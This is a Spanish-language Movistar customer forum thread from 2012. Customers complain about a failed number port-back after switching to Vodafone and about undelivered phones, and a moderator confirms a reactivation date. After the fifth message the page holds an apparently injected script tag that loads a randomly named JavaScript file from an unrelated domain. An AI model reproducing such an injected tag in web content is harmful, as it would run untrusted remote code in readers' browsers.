A vueltas con la Retroportabilidad

Verochi
Yo probé el VDSL
A vueltas con la Retroportabilidad

Buenas noches a tod@s, os voy a comentar mi caso.

Según me comentaron desde el departamento de portabilidades de Movistar, hubo un error y no mandaron desde Movistar a vodafone la grabación donde aceptaba la oferta que ellos me ofrecían, y la portabilidad con vodafone no tuvo vuelta a atrás. Me dijeron que iniciase una retroportabilidad y llevo sin movil más de 7 días y sin señales de vida por parte del 224472. Esto es desesperante... 

Lo peor es que cuando inicié la portabilidad, veía que pasaba el tiempo y no me mandaban el mensaje de cancelación de éstay yo llamaba, me decían que no había problema que esperase, y cuando volví a llamar  al día siguiente, me contestaron que fuese a una tienda física de vodafone a cancelarla porque había pasado el plazo! Lo mejor de todo es que cuando fui a vodafone me dijeron que ya no se podía hacer nada! Vamos que me volví loca para nada, me parece un despropósito total por parte de la atención al cliente.

Os agradecería vuestra ayuda, ya que no hago más que insistir y nadie sabe nada.

Mensaje 1 de 11
519 Visitas
10 RESPUESTAS 10
ltg
Mi vida cambió con el ADSL
Mi vida cambió con el ADSL

Hola, yo estoy igual que tú y lo único que te dicen en Movistar es que lo sienten pero... quien se fastidia somos los clientes.

 

Espero que tengas suerte.

 

Ya que yo lo veo muy muy negro esto.

 

Mensaje 2 de 11
460 Visitas
Franper
Más integrado que la RDSI

Me siento engañado y defraudado. Pensé que movistar trabajaba de otra manera.

He contactado con Movistar para realizar una portabilidad Vodafone-Movistar, cliente Vodafone 5 años. Después de explicar al operador que no tengo interés por ningún termina móvil, excepto el Nokia Lumia 800…… entiendo Sr……por supuesto Sr….con la portabilidad  Vodafone-Movistar le enviaremos a casa un Nokia Lumia 800 con la tarifa 21 y pagará Ud. 129€ al recibirlo….. está de acuerdo Sr.

Pues, llega el paquete con un Nokia Lumia 710 que rechace desde el primer momento.

En este momento, mi teléfono inutilizado, con una línea que no quiero y sin mi dinero.

He sido engañado y defraudado por Movistar.

Saludos a quien corresponda.

Mensaje 3 de 11
457 Visitas
Verochi
Yo probé el VDSL

Igualmente. Suerte a todos

Mensaje 4 de 11
444 Visitas
GinyerLiss
Más integrado que la RDSI

VAMOS NO SOIS LOS UNICOS..MOVISTAR....ME TIENE HACE UN MES...SIN SUPUESTAMENTE EL IPHONE 4 S.. HE PERDIDO LA FIANZA EN OTRA COMPAÑIA,,, YA QUE MOVISTAR ME DABA EL IPHONE GRATIS,,normal con 4 años de contrato....,Y LO UNICO QUE HACEN ES QUE RENUEVES EL MENSAJE DE BONO Y LISTO... MIENTRAS NO YEGAN HACE UN MES EL IPHONE A  IBIZA...Y LO PEOR.....!!! ES QUE TANTA GENTE QUIERE EL IPHONE AKI QUE NO TE LO PUEDEN RESERVAR,,,SOLO TIENES QUE Pasar todos los dias por la tienda hasta que llege..eso no es normal..............

<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.09069104426578378"></script>
Mensaje 5 de 11
435 Visitas
Rebeka-movistar
Antiguo Moderador

Hola a tod@s,

 

Comentaros que os puedo gestionar la retroportabilidad de la línea. Para confirmar la oferta, es necesario que llaméis al 224472.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 6 de 11
419 Visitas
Verochi
Yo probé el VDSL

Hoy me han hecho otra vez la solicitud de la retroportabilidad ya que me han dicho que no hay constancia de que me hayan hecho solicitud alguna para la retroportabilidad que se supone estaba en curso (alucinada me hallo Emoticono sorprendido),  y eso que llevo a vueltas entre unas cosas y otras desde el día 9 de febrero. El caso es que me han dicho que para confirmarla tengo que ponerme en contacto con el famoso 224472, llevo intentandolo todo el día y no lo consigo. Emoticono triste

Mensaje 7 de 11
411 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @Verochi,

 

He comprobado tu caso y consta que la solicitud de retroportabilidad ya está gestionada. La fecha previstar para que tengas línea con Movistar, es el 09/03/2012.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 8 de 11
406 Visitas
Verochi
Yo probé el VDSL

Muchas gracias eso si que es eficiencia!!!! Movistar tiene suerte de contar con personas como tu.

 

Gracias otra vez 

Mensaje 9 de 11
401 Visitas
Verochi
Yo probé el VDSL

Muchas gracias eso si que es eficiencia!!!! Movistar tiene suerte de contar con personas como tú.

 

Gracias otra vez 

Mensaje 10 de 11
400 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @Verochi,

 

Me alegro de haberte podido ayudar.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 11 de 11
382 Visitas